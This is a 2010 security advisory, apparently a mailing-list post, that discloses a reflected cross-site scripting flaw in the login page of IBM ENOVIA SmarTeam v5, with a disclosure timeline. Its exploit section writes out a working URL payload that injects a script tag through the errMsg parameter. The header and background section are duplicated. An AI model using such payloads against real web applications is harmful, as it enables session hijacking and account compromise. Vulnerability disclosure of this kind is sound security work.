=========================================
Yaniv Miron aka "Lament" Advisory March 7, 2010
IBM ENOVIA SmarTeam v5 Cross Site Scripting Vulnerability
=========================================
=====================
I. BACKGROUND
=====================
ENOVIA SmarTeam provides highly flexible product data management
and mission-critical business process management.
It helps your team optimally leverage product knowledge,
driving collaboration across the enterprise and value chain.
Yaniv Miron aka "Lament" Advisory March 7, 2010
IBM ENOVIA SmarTeam v5 Cross Site Scripting Vulnerability
=========================================
=====================
I. BACKGROUND
=====================
ENOVIA SmarTeam provides highly flexible product data management
and mission-critical business process management.
It helps your team optimally leverage product knowledge,
driving collaboration across the enterprise and value chain.
http://www-01.ibm.com/software/applications/plm/smarteam/
=====================
II. DESCRIPTION
=====================
A malicious attacker may inject scripts into the IBM ENOVIA SmarTeam application.
=====================
III. ANALYSIS
=====================
Exploitation of this vulnerability results in the execution of arbitrary
code using a malicious link.
=====================
IV. EXPLOIT
=====================
http://example.com/WebEditor/Authentication/LoginPage.aspx?ReturnUrl=%2f
WebEditor%2fDefault.aspx&errMsg=User+is+locked.+Too+many+logon+attempts.
"><script>alert('XSS-By-Lament')</script>
=====================
V. DISCLOSURE TIMELINE
=====================
Jan 2009 Vulnerability Found
Jan 2009 Vendor Notification
March 2010 Public Disclosure
=====================
VI. CREDIT
=====================
Yaniv Miron aka "Lament".
lament (at) ilhack (dot) org [email concealed]
[ reply ]